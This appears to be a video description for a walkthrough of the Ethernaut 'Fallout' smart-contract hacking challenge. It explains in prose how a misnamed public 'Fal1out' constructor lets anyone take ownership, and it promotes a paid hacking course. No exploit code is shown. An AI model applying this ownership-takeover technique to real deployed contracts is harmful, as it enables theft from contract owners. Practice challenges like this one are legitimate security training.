Ethernaut 2 - Fallout Foundry Solution - Walkthrough Tutorial 2023

🔐 Ethernaut Challenge 2 - Fallout Foundry Solution 2023 🔐

Are you ready to take your Smart Contract Hacking skills to the next level? In this tutorial, we'll dive deep into solving the "Ethernaut 2 - Fallout" challenge using Foundry. Our goal is to change the ownership of the Fallout smart contract, and I'll guide you through every step of the process.

📚 Prerequisites 📚

Before we start, make sure you've completed these prerequisites:

• Watch the first video in our series on how to get started with Ethernaut and set up your Foundry environment for tackling challenges: https://www.youtube.com/watch?v=UWy-CcnulCA&list=PLKXasCp8iWpjYKwk0hcdVDVZlpW_NGEYS

• Clone the Ethernaut Foundry Solutions Repository on GitHub (don't forget to leave a star 😉): https://github.com/RealJohnnyTime/ethernaut-foundry-solutions-johnnytime

• Subscribe to the JohnnyTime YouTube channel for more tutorials, updates, and the full Ethernaut Foundry Solutions playlist.

👨‍💻 Become a Certified Smart Contract Hacker 👩‍💻

If you're looking to turn Smart Contract Hacking into a career, check out our full Smart Contract Hacking Course. Gain in-depth knowledge, practice with hands-on exercises, and receive an official Smart Contract Hacker certificate, use the following discount link: https://johnnytime.xyz/smart-contract-hacker

🧐 Understanding the Challenge 🧐

Our objective in the Fallout smart contract is to claim ownership. The contract, written in an older Solidity version (0.6.0), sets the owner as the msg.sender upon deployment. However, there's no function provided to change the owner.

🔍 Spotting the Vulnerability 🔍

Upon closer inspection, we discover that the so-called constructor in the Fallout smart contract is not a constructor at all. It's a public payable function named "Fal1out" (with '1' instead of 'l'). This function won't be automatically triggered upon contract deployment, leaving the owner set to address zero. Anyone can call this function to update the owner.

💡 Exploiting the Vulnerability 💡

To exploit this vulnerability, all we need to do is call the public Fal1out() function to update the owner variable with our address. We'll solve it using Foundry.

See you in the next tutorial! 😉 ... https://www.youtube.com/watch?v=hbLuyGCSCkQ